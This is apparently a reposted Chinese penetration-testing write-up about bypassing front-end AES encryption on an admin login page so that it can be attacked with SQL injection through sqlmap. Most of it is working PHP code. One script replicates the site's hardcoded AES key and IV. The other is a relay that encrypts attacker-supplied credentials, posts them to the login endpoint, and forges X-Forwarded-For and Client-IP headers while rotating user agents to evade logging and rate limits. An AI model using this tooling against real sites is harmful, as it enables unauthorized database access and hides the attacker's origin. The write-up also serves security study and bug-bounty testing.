【转】众测厂商某站点绕过前端加密进行注入

0x01 概要

站点:http://aa.test.com:8088/Admin/Login,这样看起来是一个挺正常的界面,测试一下发现存在注入

很清楚地可以看到两张图片是有明显的区别的,说明有注入

 

抓包时发现用户名和密码进行了前端加密!!!!

0x02 查看前端加密方式

前端加密的话,那就只需要找到对应前端加密脚本即可

 

0x03 编码对应解密脚本

 

# AES加解密脚本:

<?php

/**

 * AES/CBC/PKCS5Padding模式 加密解密

 */

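class Crypt
{
    /**
     * Cipher family label. Kept so setCipher() still works; encrypt() and
     * decrypt() always use AES in CBC mode (the openssl cipher name is derived
     * from the key length in cipherName()).
     * @var string
     */
    private $cipher = 'AES';

    /**
     * Block-mode label, informational only (see $cipher).
     * @var string
     */
    private $mode = 'CBC';

    /**
     * Secret key. Its byte length selects the AES variant: 16 -> AES-128,
     * 24 -> AES-192, 32 -> AES-256. The 32-byte default therefore gives
     * AES-256-CBC, which is what MCRYPT_RIJNDAEL_128 computed with this key.
     * @var string
     */
    private $secret_key = '123456789ABCDEFG123456789ABCDEFG';

    /**
     * Initialisation vector, exactly one block (16 bytes). Because it is a
     * fixed value, equal plaintexts under the same key give equal ciphertexts.
     * @var string
     */
    private $iv = '123456789ABCDEFG';

    /**
     * Override the cipher label; an empty/falsy value is ignored.
     * The label does not change what encrypt()/decrypt() do.
     */
    function setCipher($cipher = '')
    {
        if ($cipher) {
            $this->cipher = $cipher;
        }
    }

    /**
     * Override the mode label; an empty/falsy value is ignored.
     */
    function setMode($mode = '')
    {
        if ($mode) {
            $this->mode = $mode;
        }
    }

    /**
     * Replace the key; an empty/falsy value is ignored. The length is only
     * validated when encrypt()/decrypt() is called.
     */
    function setSecretKey($secret_key = '')
    {
        if ($secret_key) {
            $this->secret_key = $secret_key;
        }
    }

    /**
     * Replace the IV; an empty/falsy value is ignored. Must be 16 bytes.
     */
    function setIv($iv = '')
    {
        if ($iv) {
            $this->iv = $iv;
        }
    }

    /**
     * Encrypt a string: PKCS#5/7-pad to the block size, AES-CBC with the
     * configured key and IV, and return the ciphertext as lowercase hex.
     *
     * Ported from the removed mcrypt extension (gone since PHP 7.2) to
     * openssl; the output format is unchanged.
     *
     * @param string $str Plaintext (binary-safe).
     * @return string Lowercase hex, length a multiple of 32 characters.
     * @throws InvalidArgumentException on an unsupported key or IV length.
     * @throws RuntimeException if the openssl call fails.
     */
    function encrypt($str)
    {
        $cipher = $this->cipherName();
        $size = openssl_cipher_iv_length($cipher);
        $padded = $this->pkcs5Pad((string) $str, $size);
        // OPENSSL_ZERO_PADDING turns off openssl's own PKCS#7 padding so the
        // padding applied above is the only one, matching the mcrypt output.
        $raw = openssl_encrypt($padded, $cipher, $this->secret_key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $this->iv);
        if ($raw === false) {
            throw new RuntimeException('openssl_encrypt failed: ' . openssl_error_string());
        }
        return strtolower(bin2hex($raw));
    }

    /**
     * Decrypt hex produced by encrypt() (either case accepted).
     *
     * @param string $str Hex ciphertext.
     * @return string|false Plaintext, or false when the input is not valid
     *                      hex, is not block-aligned, or its padding is
     *                      inconsistent.
     * @throws InvalidArgumentException on an unsupported key or IV length.
     */
    function decrypt($str)
    {
        $cipher = $this->cipherName();
        $raw = $this->hex2bin(strtolower((string) $str));
        if ($raw === false) {
            return false;
        }
        $plain = openssl_decrypt($raw, $cipher, $this->secret_key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $this->iv);
        if ($plain === false) {
            return false;
        }
        return $this->pkcs5Unpad($plain);
    }

    /**
     * Map the key length to the openssl cipher name and check the IV length.
     *
     * @return string e.g. 'aes-256-cbc'
     * @throws InvalidArgumentException
     */
    private function cipherName()
    {
        $keyLen = strlen($this->secret_key);
        $bits = 8 * $keyLen;
        if ($bits !== 128 && $bits !== 192 && $bits !== 256) {
            throw new InvalidArgumentException('AES key must be 16, 24 or 32 bytes, got ' . $keyLen);
        }
        $cipher = 'aes-' . $bits . '-cbc';
        $ivLen = openssl_cipher_iv_length($cipher);
        if (strlen($this->iv) !== $ivLen) {
            throw new InvalidArgumentException('IV must be exactly ' . $ivLen . ' bytes');
        }
        return $cipher;
    }

    /**
     * Inverse of bin2hex(). Returns false instead of emitting a warning when
     * the input is empty, has odd length or contains non-hex characters.
     *
     * @param string $hexData
     * @return string|false
     */
    private function hex2bin($hexData)
    {
        if (!preg_match('/^(?:[0-9a-fA-F]{2})+$/', $hexData)) {
            return false;
        }
        return \hex2bin($hexData);
    }

    /**
     * PKCS#5/7 padding: append N bytes of value N (1 <= N <= block size) so the
     * result is block-aligned; an already aligned input gets a full block.
     *
     * @param string $text
     * @param int    $blocksize
     * @return string
     */
    private function pkcs5Pad($text, $blocksize)
    {
        $pad = $blocksize - (strlen($text) % $blocksize);
        return $text . str_repeat(chr($pad), $pad);
    }

    /**
     * Strip PKCS#5/7 padding. Returns false when the text is empty, the last
     * byte is 0 or larger than the text, or the trailing bytes are not all
     * equal to it. (The original read the last byte with the $text{...}
     * offset syntax, which PHP 8 removed.)
     *
     * @param string $text
     * @return string|false
     */
    private function pkcs5Unpad($text)
    {
        $len = strlen($text);
        if ($len === 0) {
            return false;
        }
        $pad = ord($text[$len - 1]);
        if ($pad < 1 || $pad > $len) {
            return false;
        }
        if (strspn($text, chr($pad), $len - $pad) !== $pad) {
            return false;
        }
        return substr($text, 0, $len - $pad);
    }
}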

// Sanity check: the hex printed here should match what the site's front-end
// script produces for the same input ("111").
$demo = new Crypt();
echo $demo->encrypt('111');

可以看得到是一致的,那就可以正常注入了

# 注入脚本:

<?php

/**

 * AES/CBC/PKCS5Padding模式 加密解密

 */

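class Crypt
{
    /**
     * Cipher family label. Kept so setCipher() still works; encrypt() and
     * decrypt() always use AES in CBC mode (the openssl cipher name is derived
     * from the key length in cipherName()).
     * @var string
     */
    private $cipher = 'AES';

    /**
     * Block-mode label, informational only (see $cipher).
     * @var string
     */
    private $mode = 'CBC';

    /**
     * Secret key. Its byte length selects the AES variant: 16 -> AES-128,
     * 24 -> AES-192, 32 -> AES-256. The 32-byte default therefore gives
     * AES-256-CBC, which is what MCRYPT_RIJNDAEL_128 computed with this key.
     * @var string
     */
    private $secret_key = '123456789ABCDEFG123456789ABCDEFG';

    /**
     * Initialisation vector, exactly one block (16 bytes). Because it is a
     * fixed value, equal plaintexts under the same key give equal ciphertexts.
     * @var string
     */
    private $iv = '123456789ABCDEFG';

    /**
     * Override the cipher label; an empty/falsy value is ignored.
     * The label does not change what encrypt()/decrypt() do.
     */
    function setCipher($cipher = '')
    {
        if ($cipher) {
            $this->cipher = $cipher;
        }
    }

    /**
     * Override the mode label; an empty/falsy value is ignored.
     */
    function setMode($mode = '')
    {
        if ($mode) {
            $this->mode = $mode;
        }
    }

    /**
     * Replace the key; an empty/falsy value is ignored. The length is only
     * validated when encrypt()/decrypt() is called.
     */
    function setSecretKey($secret_key = '')
    {
        if ($secret_key) {
            $this->secret_key = $secret_key;
        }
    }

    /**
     * Replace the IV; an empty/falsy value is ignored. Must be 16 bytes.
     */
    function setIv($iv = '')
    {
        if ($iv) {
            $this->iv = $iv;
        }
    }

    /**
     * Encrypt a string: PKCS#5/7-pad to the block size, AES-CBC with the
     * configured key and IV, and return the ciphertext as lowercase hex.
     *
     * Ported from the removed mcrypt extension (gone since PHP 7.2) to
     * openssl; the output format is unchanged.
     *
     * @param string $str Plaintext (binary-safe).
     * @return string Lowercase hex, length a multiple of 32 characters.
     * @throws InvalidArgumentException on an unsupported key or IV length.
     * @throws RuntimeException if the openssl call fails.
     */
    function encrypt($str)
    {
        $cipher = $this->cipherName();
        $size = openssl_cipher_iv_length($cipher);
        $padded = $this->pkcs5Pad((string) $str, $size);
        // OPENSSL_ZERO_PADDING turns off openssl's own PKCS#7 padding so the
        // padding applied above is the only one, matching the mcrypt output.
        $raw = openssl_encrypt($padded, $cipher, $this->secret_key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $this->iv);
        if ($raw === false) {
            throw new RuntimeException('openssl_encrypt failed: ' . openssl_error_string());
        }
        return strtolower(bin2hex($raw));
    }

    /**
     * Decrypt hex produced by encrypt() (either case accepted).
     *
     * @param string $str Hex ciphertext.
     * @return string|false Plaintext, or false when the input is not valid
     *                      hex, is not block-aligned, or its padding is
     *                      inconsistent.
     * @throws InvalidArgumentException on an unsupported key or IV length.
     */
    function decrypt($str)
    {
        $cipher = $this->cipherName();
        $raw = $this->hex2bin(strtolower((string) $str));
        if ($raw === false) {
            return false;
        }
        $plain = openssl_decrypt($raw, $cipher, $this->secret_key, OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING, $this->iv);
        if ($plain === false) {
            return false;
        }
        return $this->pkcs5Unpad($plain);
    }

    /**
     * Map the key length to the openssl cipher name and check the IV length.
     *
     * @return string e.g. 'aes-256-cbc'
     * @throws InvalidArgumentException
     */
    private function cipherName()
    {
        $keyLen = strlen($this->secret_key);
        $bits = 8 * $keyLen;
        if ($bits !== 128 && $bits !== 192 && $bits !== 256) {
            throw new InvalidArgumentException('AES key must be 16, 24 or 32 bytes, got ' . $keyLen);
        }
        $cipher = 'aes-' . $bits . '-cbc';
        $ivLen = openssl_cipher_iv_length($cipher);
        if (strlen($this->iv) !== $ivLen) {
            throw new InvalidArgumentException('IV must be exactly ' . $ivLen . ' bytes');
        }
        return $cipher;
    }

    /**
     * Inverse of bin2hex(). Returns false instead of emitting a warning when
     * the input is empty, has odd length or contains non-hex characters.
     *
     * @param string $hexData
     * @return string|false
     */
    private function hex2bin($hexData)
    {
        if (!preg_match('/^(?:[0-9a-fA-F]{2})+$/', $hexData)) {
            return false;
        }
        return \hex2bin($hexData);
    }

    /**
     * PKCS#5/7 padding: append N bytes of value N (1 <= N <= block size) so the
     * result is block-aligned; an already aligned input gets a full block.
     *
     * @param string $text
     * @param int    $blocksize
     * @return string
     */
    private function pkcs5Pad($text, $blocksize)
    {
        $pad = $blocksize - (strlen($text) % $blocksize);
        return $text . str_repeat(chr($pad), $pad);
    }

    /**
     * Strip PKCS#5/7 padding. Returns false when the text is empty, the last
     * byte is 0 or larger than the text, or the trailing bytes are not all
     * equal to it. (The original read the last byte with the $text{...}
     * offset syntax, which PHP 8 removed.)
     *
     * @param string $text
     * @return string|false
     */
    private function pkcs5Unpad($text)
    {
        $len = strlen($text);
        if ($len === 0) {
            return false;
        }
        $pad = ord($text[$len - 1]);
        if ($pad < 1 || $pad > $len) {
            return false;
        }
        if (strspn($text, chr($pad), $len - $pad) !== $pad) {
            return false;
        }
        return substr($text, 0, $len - $pad);
    }
}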

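class SqlCurl
{
    /**
     * Perform one HTTP request with cURL and return the response body.
     *
     * @param string $url      Target URL.
     * @param array  $post     Form fields; when non-empty the request becomes a
     *                         POST with an application/x-www-form-urlencoded body.
     * @param string $cookie   Raw Cookie header value; not sent when empty.
     * @param string $referurl Referer header; defaults to https://www.baidu.com.
     * @return string|false    Response body, the cURL error message when the
     *                         transfer fails, or false if cURL returned no body.
     */
    public function curlRequest($url, $post = [], $cookie = '', $referurl = '')
    {
        if (!$referurl) {
            $referurl = 'https://www.baidu.com';
        }

        // All of these address headers are chosen by the client, so a server
        // must never use CLIENT-IP / X-Forwarded-For for access control, rate
        // limiting or audit logging unless they come from a configured trusted
        // proxy. Each entry draws its own random value, as in the original.
        // The HTTP_X_FORWARDED_FOR entry has no ':' and the HTTP_* / REMOTE_ADDR
        // names are CGI variable names rather than header names; they are kept
        // exactly as the original wrote them.
        $header = [
            'CLIENT-IP:' . $this->getIp(),
            'X-FORWARDED-FOR:' . $this->getIp(),
            'HTTP_CLIENT_IP:' . $this->getIp(),
            'HTTP_X_FORWARDED_FOR' . $this->getIp(),
            'REMOTE_ADDR:' . $this->getIp(),
            'Content-Type:application/x-www-form-urlencoded',
            'X-Requested-With:XMLHttpRequest',
        ];

        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        // Random browser User-Agent from the fixed list in agentArry().
        curl_setopt($curl, CURLOPT_USERAGENT, $this->agentArry());
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
        curl_setopt($curl, CURLOPT_REFERER, $referurl);
        curl_setopt($curl, CURLOPT_HTTPHEADER, $header);

        if ($post) {
            curl_setopt($curl, CURLOPT_POST, 1);
            curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
        }

        if ($cookie) {
            curl_setopt($curl, CURLOPT_COOKIE, $cookie);
        }

        curl_setopt($curl, CURLOPT_TIMEOUT, 10);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        $data = curl_exec($curl);

        // Read the error before closing, then close on both paths: the
        // original returned early on error and leaked the handle.
        $error = curl_errno($curl) ? curl_error($curl) : null;
        curl_close($curl);

        if ($error !== null) {
            return $error;
        }
        return $data;
    }

    /**
     * Build a random dotted-quad string used only to vary the address headers
     * above; it is not an address of this host and mt_rand() is fine for that
     * non-security purpose.
     *
     * @return string
     */
    private function getIp()
    {
        return mt_rand(11, 191) . "." . mt_rand(0, 240) . "." . mt_rand(1, 240) . "." . mt_rand(1, 240);
    }

    /**
     * Pick one User-Agent string at random from a fixed desktop/mobile list.
     *
     * @return string
     */
    private function agentArry()
    {
        $agentarry = [
            //PC端的UserAgent
            "safari 5.1 – MAC" => "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
            "safari 5.1 – Windows" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
            "Firefox 38esr" => "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
            "IE 11" => "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko",
            "IE 9.0" => "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0",
            "IE 8.0" => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
            "IE 7.0" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
            "IE 6.0" => "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
            "Firefox 4.0.1 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
            "Firefox 4.0.1 – Windows" => "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
            "Opera 11.11 – MAC" => "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
            "Opera 11.11 – Windows" => "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
            "Chrome 17.0 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
            "傲游(Maxthon)" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)",
            "腾讯TT" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)",
            "世界之窗(The World) 2.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
            "世界之窗(The World) 3.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)",
            "360浏览器" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
            "搜狗浏览器 1.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)",
            "Avant" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)",
            "Green Browser" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
            //移动端口
            "safari iOS 4.33 – iPhone" => "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
            "safari iOS 4.33 – iPod Touch" => "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
            "safari iOS 4.33 – iPad" => "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
            "Android N1" => "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
            "Android QQ浏览器 For android" => "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
            "Android Opera Mobile" => "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10",
            "Android Pad Moto Xoom" => "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
            "BlackBerry" => "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+",
            "WebOS HP Touchpad" => "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0",
            "UC标准" => "NOKIA5700/ UCWEB7.0.2.37/28/999",
            "UCOpenwave" => "Openwave/ UCWEB7.0.2.37/28/999",
            "UC Opera" => "Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999",
            "微信内置浏览器" => "Mozilla/5.0 (Linux; Android 6.0; 1503-M02 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile MQQBrowser/6.2 TBS/036558 Safari/537.36 MicroMessenger/6.3.25.861 NetType/WIFI Language/zh_CN",
        ];
        return $agentarry[array_rand($agentarry)];
    }
}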

// http://aa.test.com:8088/Admin/Login?tdsourcetag=s_pctim_aiomsg#

// The browser-side AES is reproducible by anyone who can read the page's
// script (key and IV are in it), so it is transport obfuscation, not an input
// control: the server must still treat the decrypted fields as untrusted and
// use parameterised queries.
$crypt = new Crypt();
$data = [
    'UserName' => $crypt->encrypt($_GET['UserName']),
    'Password' => $crypt->encrypt($_GET['Password']),
];
echo (new SqlCurl())->curlRequest('http://aa.test.com:8088/Admin/Login_Submit', $data);

0x04 Sqlmap正常注入

 

 转载于:https://mp.weixin.qq.com/s/NU3FSWbF-kV0TkYqe9jEGg

原文地址:https://www.cnblogs.com/sunny11/p/14675878.html